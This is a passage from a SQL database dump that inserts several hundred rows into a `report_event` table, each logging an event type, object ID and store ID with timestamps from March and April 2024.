(10318, '2024-03-20 07:21:20', 1, 2064, 0, 1, 1),
(10319, '2024-03-20 11:55:24', 1, 2062, 0, 1, 1),
(10320, '2024-03-20 14:18:51', 1, 2054, 0, 1, 1),
(10321, '2024-03-20 16:01:44', 1, 2063, 0, 1, 1),
(10322, '2024-03-20 18:41:35', 1, 2059, 0, 1, 1),
(10323, '2024-03-20 20:28:15', 1, 2060, 0, 1, 1),
(10324, '2024-03-20 20:47:38', 1, 2060, 0, 1, 1),
(10325, '2024-03-20 20:47:50', 1, 2064, 0, 1, 1),
(10326, '2024-03-20 23:46:54', 1, 2061, 0, 1, 1),
(10327, '2024-03-21 00:17:48', 1, 2064, 0, 1, 1),
(10328, '2024-03-21 01:34:46', 1, 2054, 0, 1, 1),
(10329, '2024-03-21 06:12:51', 1, 2059, 0, 1, 1),
(10330, '2024-03-21 07:28:10', 1, 2063, 0, 1, 1),
(10331, '2024-03-21 08:06:45', 1, 2059, 0, 1, 1),
(10332, '2024-03-21 08:20:40', 1, 2064, 0, 1, 1),
(10333, '2024-03-21 12:36:28', 1, 2054, 0, 1, 1),
(10334, '2024-03-21 13:45:18', 1, 2058, 0, 1, 1),
(10335, '2024-03-21 14:18:25', 1, 2053, 0, 1, 1),
(10336, '2024-03-21 14:21:36', 1, 2058, 0, 1, 1),
(10337, '2024-03-21 14:51:27', 1, 2060, 0, 1, 1),
(10338, '2024-03-21 15:01:27', 1, 2063, 0, 1, 1),
(10339, '2024-03-21 15:27:56', 1, 2058, 0, 1, 1),
(10340, '2024-03-21 16:09:26', 1, 2060, 0, 1, 1),
(10341, '2024-03-21 16:15:35', 1, 2055, 0, 1, 1),
(10342, '2024-03-21 16:17:29', 1, 2063, 0, 1, 1),
(10343, '2024-03-21 16:39:00', 1, 2058, 0, 1, 1),
(10344, '2024-03-21 17:11:33', 1, 2059, 0, 1, 1),
(10345, '2024-03-21 17:21:36', 1, 2055, 0, 1, 1),
(10346, '2024-03-21 17:47:15', 1, 2058, 0, 1, 1),
(10347, '2024-03-21 18:30:59', 1, 2061, 0, 1, 1),
(10348, '2024-03-21 19:08:11', 1, 2062, 0, 1, 1),
(10349, '2024-03-21 20:24:16', 1, 2054, 0, 1, 1),
(10350, '2024-03-21 20:27:54', 1, 2064, 0, 1, 1),
(10351, '2024-03-21 20:40:26', 1, 2059, 0, 1, 1),
(10352, '2024-03-21 20:53:43', 1, 2064, 0, 1, 1),
(10353, '2024-03-21 22:32:37', 1, 2062, 0, 1, 1),
(10354, '2024-03-22 00:00:11', 1, 2062, 0, 1, 1),
(10355, '2024-03-22 00:55:55', 1, 2059, 0, 1, 1),
(10356, '2024-03-22 01:49:11', 1, 2064, 0, 1, 1),
(10357, '2024-03-22 01:50:27', 1, 2062, 0, 1, 1),
(10358, '2024-03-22 01:51:26', 1, 2053, 0, 1, 1),
(10359, '2024-03-22 01:51:58', 1, 2063, 0, 1, 1),
(10360, '2024-03-22 01:52:19', 1, 2061, 0, 1, 1),
(10361, '2024-03-22 01:52:27', 1, 2059, 0, 1, 1),
(10362, '2024-03-22 01:52:31', 1, 2058, 0, 1, 1),
(10363, '2024-03-22 01:54:20', 1, 2055, 0, 1, 1),
(10364, '2024-03-22 01:54:22', 1, 2054, 0, 1, 1),
(10365, '2024-03-22 01:56:40', 1, 2060, 0, 1, 1),
(10366, '2024-03-22 02:02:35', 1, 2063, 0, 1, 1),
(10367, '2024-03-22 04:51:38', 1, 2064, 0, 1, 1),
(10368, '2024-03-22 05:11:31', 1, 2054, 0, 1, 1),
(10369, '2024-03-22 06:11:04', 1, 2064, 0, 1, 1),
(10370, '2024-03-22 11:19:17', 1, 2064, 0, 1, 1),
(10371, '2024-03-22 21:16:30', 1, 2061, 0, 1, 1),
(10372, '2024-03-22 22:32:36', 1, 2062, 0, 1, 1),
(10373, '2024-03-23 00:50:45', 1, 2064, 0, 1, 1),
(10374, '2024-03-23 09:58:47', 1, 2059, 0, 1, 1),
(10375, '2024-03-23 10:00:10', 1, 2059, 0, 1, 1),
(10376, '2024-03-23 10:00:19', 1, 2059, 0, 1, 1),
(10377, '2024-03-23 14:40:00', 1, 2059, 0, 1, 1),
(10378, '2024-03-23 15:06:40', 1, 2058, 0, 1, 1),
(10379, '2024-03-23 16:13:14', 1, 2053, 0, 1, 1),
(10380, '2024-03-23 20:38:44', 1, 2058, 0, 1, 1),
(10381, '2024-03-23 23:17:55', 1, 2062, 0, 1, 1),
(10382, '2024-03-24 00:44:22', 1, 2058, 0, 1, 1),
(10383, '2024-03-24 01:26:48', 1, 2055, 0, 1, 1),
(10384, '2024-03-24 03:21:51', 1, 2064, 0, 1, 1),
(10385, '2024-03-24 13:17:53', 1, 2064, 0, 1, 1),
(10386, '2024-03-24 15:52:00', 1, 2059, 0, 1, 1),
(10387, '2024-03-24 18:09:54', 1, 2053, 0, 1, 1),
(10388, '2024-03-24 22:14:20', 1, 2064, 0, 1, 1),
(10389, '2024-03-25 05:12:49', 1, 2063, 0, 1, 1),
(10390, '2024-03-25 05:12:49', 1, 2060, 0, 1, 1),
(10391, '2024-03-25 05:12:53', 1, 2058, 0, 1, 1),
(10392, '2024-03-25 05:12:54', 1, 2061, 0, 1, 1),
(10393, '2024-03-25 05:12:55', 1, 2064, 0, 1, 1),
(10394, '2024-03-25 05:12:57', 1, 2054, 0, 1, 1),
(10395, '2024-03-25 05:12:58', 1, 2062, 0, 1, 1),
(10396, '2024-03-25 05:12:59', 1, 2059, 0, 1, 1),
(10397, '2024-03-25 05:13:02', 1, 2055, 0, 1, 1),
(10398, '2024-03-25 05:50:50', 1, 2054, 0, 1, 1),
(10399, '2024-03-25 05:50:51', 1, 2055, 0, 1, 1),
(10400, '2024-03-25 05:50:55', 1, 2064, 0, 1, 1),
(10401, '2024-03-25 05:50:57', 1, 2063, 0, 1, 1),
(10402, '2024-03-25 05:50:58', 1, 2062, 0, 1, 1),
(10403, '2024-03-25 05:50:59', 1, 2060, 0, 1, 1),
(10404, '2024-03-25 05:51:07', 1, 2059, 0, 1, 1),
(10405, '2024-03-25 05:51:08', 1, 2058, 0, 1, 1),
(10406, '2024-03-25 05:51:09', 1, 2061, 0, 1, 1),
(10407, '2024-03-25 12:21:39', 1, 2062, 0, 1, 1),
(10408, '2024-03-25 12:21:40', 1, 2062, 0, 1, 1),
(10409, '2024-03-25 15:40:51', 1, 2064, 0, 1, 1),
(10410, '2024-03-25 19:54:42', 1, 2060, 0, 1, 1),
(10411, '2024-03-25 21:15:11', 1, 2054, 0, 1, 1),
(10412, '2024-03-26 08:39:28', 1, 2055, 0, 1, 1),
(10413, '2024-03-26 08:48:01', 1, 2064, 0, 1, 1),
(10414, '2024-03-26 14:00:04', 1, 2062, 0, 1, 1),
(10415, '2024-03-26 14:34:50', 1, 2054, 0, 1, 1),
(10416, '2024-03-26 16:36:04', 1, 2060, 0, 1, 1),
(10417, '2024-03-26 22:36:04', 1, 2062, 0, 1, 1),
(10418, '2024-03-27 00:28:12', 1, 2063, 0, 1, 1),
(10419, '2024-03-27 04:28:32', 1, 2064, 0, 1, 1),
(10420, '2024-03-27 07:54:27', 1, 2053, 0, 1, 1),
(10421, '2024-03-27 12:16:57', 1, 2063, 0, 1, 1),
(10422, '2024-03-27 20:45:57', 1, 2063, 0, 1, 1),
(10423, '2024-03-27 22:23:38', 1, 2058, 0, 1, 1),
(10424, '2024-03-27 23:34:07', 1, 2064, 0, 1, 1),
(10425, '2024-03-28 00:00:28', 1, 2054, 0, 1, 1),
(10426, '2024-03-28 05:48:11', 1, 2062, 0, 1, 1),
(10427, '2024-03-28 06:23:09', 1, 2064, 0, 1, 1),
(10428, '2024-03-28 07:00:50', 1, 2062, 0, 1, 1),
(10429, '2024-03-28 07:16:07', 1, 2063, 0, 1, 1),
(10430, '2024-03-28 14:23:36', 1, 2054, 0, 1, 1),
(10431, '2024-03-28 14:34:24', 1, 2061, 0, 1, 1),
(10432, '2024-03-28 16:57:09', 1, 2064, 0, 1, 1),
(10433, '2024-03-29 00:19:50', 1, 2054, 0, 1, 1),
(10434, '2024-03-29 02:33:25', 1, 2053, 0, 1, 1),
(10435, '2024-03-29 08:25:43', 1, 2059, 0, 1, 1),
(10436, '2024-03-29 10:15:51', 1, 2054, 0, 1, 1),
(10437, '2024-03-29 10:50:47', 1, 2053, 0, 1, 1),
(10438, '2024-03-29 13:01:25', 1, 2061, 0, 1, 1),
(10439, '2024-03-29 13:01:26', 1, 2061, 0, 1, 1),
(10440, '2024-03-29 13:40:00', 1, 2058, 0, 1, 1),
(10441, '2024-03-29 13:40:01', 1, 2059, 0, 1, 1),
(10442, '2024-03-29 13:40:01', 1, 2063, 0, 1, 1),
(10443, '2024-03-29 13:40:07', 1, 2060, 0, 1, 1),
(10444, '2024-03-29 13:40:10', 1, 2054, 0, 1, 1),
(10445, '2024-03-29 13:40:12', 1, 2062, 0, 1, 1),
(10446, '2024-03-29 13:40:14', 1, 2064, 0, 1, 1),
(10447, '2024-03-29 13:40:16', 1, 2055, 0, 1, 1),
(10448, '2024-03-29 13:40:16', 1, 2061, 0, 1, 1),
(10449, '2024-03-29 16:47:00', 1, 2064, 0, 1, 1),
(10450, '2024-03-29 16:47:04', 1, 2064, 0, 1, 1),
(10451, '2024-03-29 16:47:16', 1, 2064, 0, 1, 1),
(10452, '2024-03-29 16:48:19', 1, 2064, 0, 1, 1),
(10453, '2024-03-29 17:16:11', 1, 2054, 0, 1, 1),
(10454, '2024-03-30 00:11:20', 1, 2061, 0, 1, 1),
(10455, '2024-03-30 09:31:32', 1, 2060, 0, 1, 1),
(10456, '2024-03-30 14:48:00', 1, 2053, 0, 1, 1),
(10457, '2024-03-30 15:55:55', 1, 2060, 0, 1, 1),
(10458, '2024-03-30 16:58:43', 1, 2060, 0, 1, 1),
(10459, '2024-03-30 16:58:45', 1, 2061, 0, 1, 1),
(10460, '2024-03-30 17:16:59', 1, 2063, 0, 1, 1),
(10461, '2024-03-30 18:03:42', 1, 2058, 0, 1, 1),
(10462, '2024-03-30 19:27:27', 1, 2055, 0, 1, 1),
(10463, '2024-03-30 22:45:10', 1, 2060, 0, 1, 1),
(10464, '2024-03-30 22:55:11', 1, 2063, 0, 1, 1),
(10465, '2024-03-30 23:20:46', 1, 2058, 0, 1, 1),
(10466, '2024-03-31 00:05:53', 1, 2055, 0, 1, 1),
(10467, '2024-03-31 01:24:28', 1, 2061, 0, 1, 1),
(10468, '2024-03-31 02:07:49', 1, 2062, 0, 1, 1),
(10469, '2024-03-31 03:19:42', 1, 2054, 0, 1, 1),
(10470, '2024-03-31 03:34:56', 1, 2059, 0, 1, 1),
(10471, '2024-03-31 03:48:12', 1, 2064, 0, 1, 1),
(10472, '2024-03-31 05:47:35', 1, 2054, 0, 1, 1),
(10473, '2024-03-31 08:26:47', 1, 2060, 0, 1, 1),
(10474, '2024-03-31 23:17:18', 1, 2053, 0, 1, 1),
(10475, '2024-04-01 04:37:48', 1, 2064, 0, 1, 1),
(10476, '2024-04-01 11:00:14', 1, 2054, 0, 1, 1),
(10477, '2024-04-01 16:05:58', 1, 2060, 0, 1, 1),
(10478, '2024-04-01 16:16:21', 1, 2058, 0, 1, 1),
(10479, '2024-04-01 17:36:29', 1, 2064, 0, 1, 1),
(10480, '2024-04-02 12:39:47', 1, 2062, 0, 1, 1),
(10481, '2024-04-02 15:51:17', 1, 2061, 0, 1, 1),
(10482, '2024-04-02 23:28:10', 1, 2053, 0, 1, 1),
(10483, '2024-04-03 05:25:35', 1, 2060, 0, 1, 1),
(10484, '2024-04-03 06:11:28', 1, 2063, 0, 1, 1),
(10485, '2024-04-03 19:22:03', 1, 2054, 0, 1, 1),
(10486, '2024-04-04 05:00:37', 1, 2064, 0, 1, 1),
(10487, '2024-04-04 08:32:04', 1, 2055, 0, 1, 1),
(10488, '2024-04-04 13:32:24', 1, 2054, 0, 1, 1),
(10489, '2024-04-04 20:03:43', 1, 2061, 0, 1, 1),
(10490, '2024-04-04 20:57:33', 1, 2062, 0, 1, 1),
(10491, '2024-04-05 08:21:09', 1, 2064, 0, 1, 1),
(10492, '2024-04-05 11:28:55', 1, 2053, 0, 1, 1),
(10493, '2024-04-05 19:56:22', 1, 2064, 0, 1, 1),
(10494, '2024-04-05 21:42:23', 1, 2064, 0, 1, 1),
(10495, '2024-04-05 21:43:29', 1, 2064, 0, 1, 1),
(10496, '2024-04-05 21:43:31', 1, 2062, 0, 1, 1),
(10497, '2024-04-05 21:43:31', 1, 2064, 0, 1, 1),
(10498, '2024-04-05 21:43:31', 1, 2063, 0, 1, 1),
(10499, '2024-04-05 21:43:32', 1, 2061, 0, 1, 1),
(10500, '2024-04-05 21:43:32', 1, 2060, 0, 1, 1),
(10501, '2024-04-05 21:43:39', 1, 2059, 0, 1, 1),
(10502, '2024-04-05 21:43:44', 1, 2058, 0, 1, 1),
(10503, '2024-04-05 21:43:50', 1, 2055, 0, 1, 1),
(10504, '2024-04-05 21:43:55', 1, 2054, 0, 1, 1),
(10505, '2024-04-06 00:48:41', 1, 2054, 0, 1, 1),
(10506, '2024-04-06 02:49:08', 1, 2054, 0, 1, 1),
(10507, '2024-04-06 05:02:14', 1, 2064, 0, 1, 1),
(10508, '2024-04-06 08:18:20', 1, 2053, 0, 1, 1),
(10509, '2024-04-06 08:18:40', 1, 2063, 0, 1, 1),
(10510, '2024-04-06 08:18:44', 1, 2062, 0, 1, 1),
(10511, '2024-04-06 08:18:47', 1, 2060, 0, 1, 1),
(10512, '2024-04-06 08:18:51', 1, 2059, 0, 1, 1),
(10513, '2024-04-06 14:36:46', 1, 2061, 0, 1, 1),
(10514, '2024-04-07 00:49:25', 1, 2055, 0, 1, 1),
(10515, '2024-04-07 00:49:29', 1, 2058, 0, 1, 1),
(10516, '2024-04-07 18:49:41', 1, 2061, 0, 1, 1),
(10517, '2024-04-07 22:48:00', 1, 2055, 0, 1, 1),
(10518, '2024-04-08 04:10:05', 1, 2053, 0, 1, 1),
(10519, '2024-04-08 04:14:45', 1, 2053, 0, 1, 1),
(10520, '2024-04-08 04:17:12', 1, 2054, 0, 1, 1),
(10521, '2024-04-08 04:19:40', 1, 2053, 0, 1, 1),
(10522, '2024-04-08 04:21:54', 1, 2054, 0, 1, 1),
(10523, '2024-04-08 04:24:21', 1, 2055, 0, 1, 1),
(10524, '2024-04-08 04:26:58', 1, 2054, 0, 1, 1),
(10525, '2024-04-08 04:29:08', 1, 2055, 0, 1, 1),
(10526, '2024-04-08 04:38:48', 1, 2053, 0, 1, 1),
(10527, '2024-04-08 04:41:17', 1, 2054, 0, 1, 1),
(10528, '2024-04-08 04:43:44', 1, 2055, 0, 1, 1),
(10529, '2024-04-08 04:54:49', 1, 2064, 0, 1, 1),
(10530, '2024-04-08 04:59:35', 1, 2064, 0, 1, 1),
(10531, '2024-04-08 05:15:20', 1, 2063, 0, 1, 1),
(10532, '2024-04-08 05:20:06', 1, 2063, 0, 1, 1),
(10533, '2024-04-08 05:22:17', 1, 2062, 0, 1, 1),
(10534, '2024-04-08 05:24:31', 1, 2063, 0, 1, 1),
(10535, '2024-04-08 05:27:25', 1, 2062, 0, 1, 1),
(10536, '2024-04-08 05:29:59', 1, 2060, 0, 1, 1),
(10537, '2024-04-08 05:32:08', 1, 2062, 0, 1, 1),
(10538, '2024-04-08 05:34:46', 1, 2060, 0, 1, 1),
(10539, '2024-04-08 05:37:50', 1, 2059, 0, 1, 1),
(10540, '2024-04-08 06:10:20', 1, 2053, 0, 1, 1),
(10541, '2024-04-08 07:59:03', 1, 2058, 0, 1, 1),
(10542, '2024-04-08 09:20:09', 1, 2063, 0, 1, 1),
(10543, '2024-04-08 13:03:18', 1, 2054, 0, 1, 1),
(10544, '2024-04-08 15:46:56', 1, 2058, 0, 1, 1),
(10545, '2024-04-08 17:38:17', 1, 2061, 0, 1, 1),
(10546, '2024-04-08 17:53:31', 1, 2054, 0, 1, 1),
(10547, '2024-04-09 12:47:03', 1, 2060, 0, 1, 1),
(10548, '2024-04-09 12:47:03', 1, 2060, 0, 1, 1),
(10549, '2024-04-09 12:47:06', 1, 2054, 0, 1, 1),
(10550, '2024-04-09 12:47:07', 1, 2054, 0, 1, 1),
(10551, '2024-04-09 12:56:00', 1, 2064, 0, 1, 1),
(10552, '2024-04-09 17:06:35', 1, 2064, 0, 1, 1),
(10553, '2024-04-10 07:07:03', 1, 2061, 0, 1, 1),
(10554, '2024-04-10 12:18:46', 1, 2060, 0, 1, 1),
(10555, '2024-04-10 12:27:00', 1, 2063, 0, 1, 1),
(10556, '2024-04-10 12:49:45', 1, 2058, 0, 1, 1),
(10557, '2024-04-10 13:32:09', 1, 2055, 0, 1, 1),
(10558, '2024-04-10 14:47:45', 1, 2061, 0, 1, 1),
(10559, '2024-04-10 15:27:58', 1, 2062, 0, 1, 1),
(10560, '2024-04-10 16:46:57', 1, 2054, 0, 1, 1),
(10561, '2024-04-10 17:06:50', 1, 2059, 0, 1, 1),
(10562, '2024-04-10 17:24:46', 1, 2064, 0, 1, 1),
(10563, '2024-04-10 19:56:42', 1, 2060, 0, 1, 1),
(10564, '2024-04-10 20:04:27', 1, 2063, 0, 1, 1),
(10565, '2024-04-10 20:25:15', 1, 2058, 0, 1, 1),
(10566, '2024-04-10 21:03:51', 1, 2055, 0, 1, 1),
(10567, '2024-04-10 21:22:00', 1, 2053, 0, 1, 1),
(10568, '2024-04-10 22:12:52', 1, 2061, 0, 1, 1),
(10569, '2024-04-10 22:49:56', 1, 2062, 0, 1, 1),
(10570, '2024-04-10 23:25:56', 1, 2060, 0, 1, 1),
(10571, '2024-04-10 23:44:22', 1, 2054, 0, 1, 1),
(10572, '2024-04-10 23:53:45', 1, 2060, 0, 1, 1);
INSERT INTO `report_event` (`event_id`, `logged_at`, `event_type_id`, `object_id`, `subject_id`, `subtype`, `store_id`) VALUES
(10573, '2024-04-11 00:00:47', 1, 2063, 0, 1, 1),
(10574, '2024-04-11 00:21:56', 1, 2058, 0, 1, 1),
(10575, '2024-04-11 00:59:47', 1, 2055, 0, 1, 1),
(10576, '2024-04-11 01:23:40', 1, 2058, 0, 1, 1),
(10577, '2024-04-11 02:07:20', 1, 2061, 0, 1, 1),
(10578, '2024-04-11 02:42:12', 1, 2062, 0, 1, 1),
(10579, '2024-04-11 03:52:38', 1, 2054, 0, 1, 1),
(10580, '2024-04-11 04:11:57', 1, 2059, 0, 1, 1),
(10581, '2024-04-11 04:28:23', 1, 2064, 0, 1, 1),
(10582, '2024-04-11 09:42:36', 1, 2054, 0, 1, 1),
(10583, '2024-04-11 11:28:28', 1, 2064, 0, 1, 1),
(10584, '2024-04-11 12:02:01', 1, 2054, 0, 1, 1),
(10585, '2024-04-11 22:16:34', 1, 2063, 0, 1, 1),
(10586, '2024-04-12 03:55:25', 1, 2054, 0, 1, 1),
(10587, '2024-04-12 09:02:26', 1, 2061, 0, 1, 1),
(10588, '2024-04-12 13:31:02', 1, 2062, 0, 1, 1),
(10589, '2024-04-12 16:36:31', 1, 2054, 0, 1, 1),
(10590, '2024-04-12 17:44:53', 1, 2054, 0, 1, 1),
(10591, '2024-04-12 18:34:19', 1, 2062, 0, 1, 1),
(10592, '2024-04-12 22:25:42', 1, 2063, 0, 1, 1),
(10593, '2024-04-12 23:48:22', 1, 2058, 0, 1, 1),
(10594, '2024-04-13 02:06:58', 1, 2054, 0, 1, 1),
(10595, '2024-04-13 08:14:47', 1, 2055, 0, 1, 1),
(10596, '2024-04-13 09:14:23', 1, 2060, 0, 1, 1),
(10597, '2024-04-13 09:28:23', 1, 2059, 0, 1, 1),
(10598, '2024-04-13 11:48:30', 1, 2054, 0, 1, 1),
(10599, '2024-04-13 13:19:31', 1, 2059, 0, 1, 1),
(10600, '2024-04-13 14:08:54', 1, 2064, 0, 1, 1),
(10601, '2024-04-13 16:01:09', 1, 2059, 0, 1, 1),
(10602, '2024-04-13 16:45:44', 1, 2061, 0, 1, 1),
(10603, '2024-04-13 18:10:18', 1, 2061, 0, 1, 1),
(10604, '2024-04-13 20:34:30', 1, 2062, 0, 1, 1),
(10605, '2024-04-14 00:44:34', 1, 2058, 0, 1, 1),
(10606, '2024-04-14 01:24:28', 1, 2060, 0, 1, 1),
(10607, '2024-04-14 01:44:07', 1, 2060, 0, 1, 1),
(10608, '2024-04-14 16:55:52', 1, 2061, 0, 1, 1),
(10609, '2024-04-14 16:55:59', 1, 2061, 0, 1, 1),
(10610, '2024-04-14 17:48:09', 1, 2059, 0, 1, 1),
(10611, '2024-04-15 12:47:05', 1, 2058, 0, 1, 1),
(10612, '2024-04-15 13:57:34', 1, 2060, 0, 1, 1),
(10613, '2024-04-15 15:08:31', 1, 2061, 0, 1, 1),
(10614, '2024-04-15 18:07:07', 1, 2061, 0, 1, 1),
(10615, '2024-04-15 18:23:27', 1, 2061, 0, 1, 1),
(10616, '2024-04-15 23:19:17', 1, 2060, 0, 1, 1),
(10617, '2024-04-15 23:19:22', 1, 2054, 0, 1, 1),
(10618, '2024-04-15 23:19:25', 1, 2060, 0, 1, 1),
(10619, '2024-04-15 23:19:27', 1, 2054, 0, 1, 1),
(10620, '2024-04-16 01:01:53', 1, 2054, 0, 1, 1),
(10621, '2024-04-16 04:52:54', 1, 2060, 0, 1, 1),
(10622, '2024-04-16 05:09:07', 1, 2054, 0, 1, 1),
(10623, '2024-04-16 06:59:50', 1, 2061, 0, 1, 1),
(10624, '2024-04-16 20:04:40', 1, 2054, 0, 1, 1),
(10625, '2024-04-16 23:47:29', 1, 2062, 0, 1, 1),
(10626, '2024-04-16 23:48:44', 1, 2063, 0, 1, 1),
(10627, '2024-04-17 03:42:25', 1, 2061, 0, 1, 1),
(10628, '2024-04-17 04:22:57', 1, 2054, 0, 1, 1),
(10629, '2024-04-17 18:32:36', 1, 2064, 0, 1, 1),
(10630, '2024-04-17 19:51:28', 1, 2058, 0, 1, 1),
(10631, '2024-04-18 00:13:22', 1, 2059, 0, 1, 1),
(10632, '2024-04-18 18:57:50', 1, 2064, 0, 1, 1),
(10633, '2024-04-18 19:46:48', 1, 2062, 0, 1, 1),
(10634, '2024-04-18 23:38:53', 1, 2063, 0, 1, 1),
(10635, '2024-04-19 01:16:52', 1, 2059, 0, 1, 1),
(10636, '2024-04-19 02:11:11', 1, 2058, 0, 1, 1),
(10637, '2024-04-19 02:11:11', 1, 2063, 0, 1, 1),
(10638, '2024-04-19 02:11:11', 1, 2060, 0, 1, 1),
(10639, '2024-04-19 02:11:11', 1, 2055, 0, 1, 1),
(10640, '2024-04-19 02:11:11', 1, 2054, 0, 1, 1),
(10641, '2024-04-19 02:11:12', 1, 2062, 0, 1, 1),
(10642, '2024-04-19 02:11:12', 1, 2061, 0, 1, 1),
(10643, '2024-04-19 02:11:13', 1, 2059, 0, 1, 1),
(10644, '2024-04-19 02:11:15', 1, 2064, 0, 1, 1),
(10645, '2024-04-19 02:11:21', 4, 2060, 2257, 1, 1),
(10646, '2024-04-19 06:38:28', 1, 2053, 0, 1, 1),
(10647, '2024-04-19 08:03:26', 1, 2059, 0, 1, 1),
(10648, '2024-04-19 08:33:07', 1, 2062, 0, 1, 1),
(10649, '2024-04-19 09:52:41', 4, 2061, 2258, 1, 1),
(10650, '2024-04-19 10:05:53', 1, 2055, 0, 1, 1),
(10651, '2024-04-19 18:40:41', 1, 2064, 0, 1, 1),
(10652, '2024-04-19 20:05:47', 1, 2054, 0, 1, 1),
(10653, '2024-04-20 05:39:44', 1, 2063, 0, 1, 1),
(10654, '2024-04-20 05:47:00', 1, 2054, 0, 1, 1),
(10655, '2024-04-20 07:00:53', 1, 2062, 0, 1, 1),
(10656, '2024-04-20 11:26:57', 1, 2063, 0, 1, 1),
(10657, '2024-04-20 12:07:51', 1, 2054, 0, 1, 1),
(10658, '2024-04-20 14:45:26', 1, 2063, 0, 1, 1),
(10659, '2024-04-20 14:56:22', 1, 2063, 0, 1, 1),
(10660, '2024-04-21 00:46:45', 1, 2054, 0, 1, 1),
(10661, '2024-04-21 02:33:20', 1, 2063, 0, 1, 1),
(10662, '2024-04-21 05:38:38', 1, 2054, 0, 1, 1),
(10663, '2024-04-21 09:38:02', 1, 2054, 0, 1, 1),
(10664, '2024-04-21 11:38:58', 1, 2054, 0, 1, 1),
(10665, '2024-04-21 12:15:11', 1, 2063, 0, 1, 1),
(10666, '2024-04-21 14:15:35', 1, 2059, 0, 1, 1),
(10667, '2024-04-21 18:14:33', 1, 2054, 0, 1, 1),
(10668, '2024-04-21 20:52:37', 1, 2064, 0, 1, 1),
(10669, '2024-04-21 20:55:36', 1, 2063, 0, 1, 1),
(10670, '2024-04-21 22:53:55', 1, 2055, 0, 1, 1),
(10671, '2024-04-22 02:00:51', 1, 2062, 0, 1, 1),
(10672, '2024-04-22 02:57:07', 1, 2063, 0, 1, 1),
(10673, '2024-04-22 05:58:14', 1, 2060, 0, 1, 1),
(10674, '2024-04-22 06:11:30', 1, 2063, 0, 1, 1),
(10675, '2024-04-22 06:46:53', 1, 2058, 0, 1, 1),
(10676, '2024-04-22 06:53:41', 1, 2054, 0, 1, 1),
(10677, '2024-04-22 07:49:11', 1, 2055, 0, 1, 1),
(10678, '2024-04-22 09:26:07', 1, 2061, 0, 1, 1),
(10679, '2024-04-22 10:08:27', 1, 2062, 0, 1, 1),
(10680, '2024-04-22 10:20:49', 1, 2061, 0, 1, 1),
(10681, '2024-04-22 11:30:58', 1, 2054, 0, 1, 1),
(10682, '2024-04-22 11:49:50', 1, 2059, 0, 1, 1),
(10683, '2024-04-22 12:02:56', 1, 2054, 0, 1, 1),
(10684, '2024-04-22 12:05:51', 1, 2064, 0, 1, 1),
(10685, '2024-04-22 13:21:15', 1, 2058, 0, 1, 1),
(10686, '2024-04-22 14:31:52', 1, 2064, 0, 1, 1),
(10687, '2024-04-22 14:45:08', 1, 2064, 0, 1, 1),
(10688, '2024-04-22 15:16:51', 1, 2063, 0, 1, 1),
(10689, '2024-04-22 17:43:36', 1, 2054, 0, 1, 1),
(10690, '2024-04-23 07:15:38', 1, 2053, 0, 1, 1),
(10691, '2024-04-23 12:51:53', 1, 2054, 0, 1, 1),
(10692, '2024-04-23 14:16:09', 1, 2063, 0, 1, 1),
(10693, '2024-04-23 15:48:34', 1, 2062, 0, 1, 1),
(10694, '2024-04-23 18:48:18', 1, 2064, 0, 1, 1),
(10695, '2024-04-23 23:21:55', 1, 2061, 0, 1, 1),
(10696, '2024-04-24 03:06:50', 1, 2054, 0, 1, 1),
(10697, '2024-04-24 06:52:42', 1, 2054, 0, 1, 1),
(10698, '2024-04-24 06:52:46', 1, 2059, 0, 1, 1),
(10699, '2024-04-24 06:52:49', 1, 2061, 0, 1, 1),
(10700, '2024-04-24 06:52:52', 1, 2058, 0, 1, 1),
(10701, '2024-04-24 08:00:06', 1, 2059, 0, 1, 1),
(10702, '2024-04-24 08:00:12', 1, 2059, 0, 1, 1),
(10703, '2024-04-24 08:00:13', 1, 2059, 0, 1, 1),
(10704, '2024-04-24 08:15:44', 1, 2054, 0, 1, 1),
(10705, '2024-04-24 11:31:35', 1, 2054, 0, 1, 1),
(10706, '2024-04-24 13:06:14', 1, 2062, 0, 1, 1),
(10707, '2024-04-24 13:06:15', 1, 2060, 0, 1, 1),
(10708, '2024-04-24 13:06:21', 1, 2054, 0, 1, 1),
(10709, '2024-04-24 13:06:25', 1, 2058, 0, 1, 1),
(10710, '2024-04-24 13:06:25', 1, 2064, 0, 1, 1),
(10711, '2024-04-24 13:06:28', 1, 2063, 0, 1, 1),
(10712, '2024-04-24 13:06:34', 1, 2061, 0, 1, 1),
(10713, '2024-04-24 13:06:34', 1, 2055, 0, 1, 1),
(10714, '2024-04-24 13:06:36', 1, 2059, 0, 1, 1),
(10715, '2024-04-24 16:10:06', 1, 2053, 0, 1, 1),
(10716, '2024-04-24 17:14:19', 1, 2053, 0, 1, 1),
(10717, '2024-04-25 00:39:03', 1, 2061, 0, 1, 1),
(10718, '2024-04-25 01:25:22', 1, 2063, 0, 1, 1),
(10719, '2024-04-25 09:23:30', 1, 2054, 0, 1, 1),
(10720, '2024-04-25 10:02:14', 1, 2062, 0, 1, 1),
(10721, '2024-04-25 11:01:22', 1, 2059, 0, 1, 1),
(10722, '2024-04-25 13:18:09', 1, 2059, 0, 1, 1),
(10723, '2024-04-25 17:22:27', 1, 2054, 0, 1, 1),
(10724, '2024-04-25 19:26:22', 1, 2063, 0, 1, 1),
(10725, '2024-04-26 00:31:06', 1, 2054, 0, 1, 1),
(10726, '2024-04-26 09:24:52', 1, 2060, 0, 1, 1),
(10727, '2024-04-26 09:48:35', 1, 2060, 0, 1, 1),
(10728, '2024-04-26 10:19:33', 1, 2055, 0, 1, 1),
(10729, '2024-04-26 10:19:36', 1, 2064, 0, 1, 1),
(10730, '2024-04-26 10:19:39', 1, 2061, 0, 1, 1),
(10731, '2024-04-26 10:19:42', 1, 2058, 0, 1, 1),
(10732, '2024-04-26 14:25:42', 1, 2063, 0, 1, 1),
(10733, '2024-04-26 14:25:44', 1, 2063, 0, 1, 1),
(10734, '2024-04-26 14:27:18', 1, 2063, 0, 1, 1),
(10735, '2024-04-26 14:35:22', 4, 2063, 2286, 1, 1),
(10736, '2024-04-26 17:41:29', 1, 2054, 0, 1, 1),
(10737, '2024-04-26 17:57:31', 1, 2062, 0, 1, 1),
(10738, '2024-04-26 23:05:53', 1, 2060, 0, 1, 1),
(10739, '2024-04-26 23:14:18', 1, 2053, 0, 1, 1),
(10740, '2024-04-27 01:00:48', 1, 2063, 0, 1, 1),
(10741, '2024-04-27 03:02:36', 1, 2062, 0, 1, 1),
(10742, '2024-04-27 05:27:26', 1, 2060, 0, 1, 1),
(10743, '2024-04-27 10:04:27', 1, 2063, 0, 1, 1),
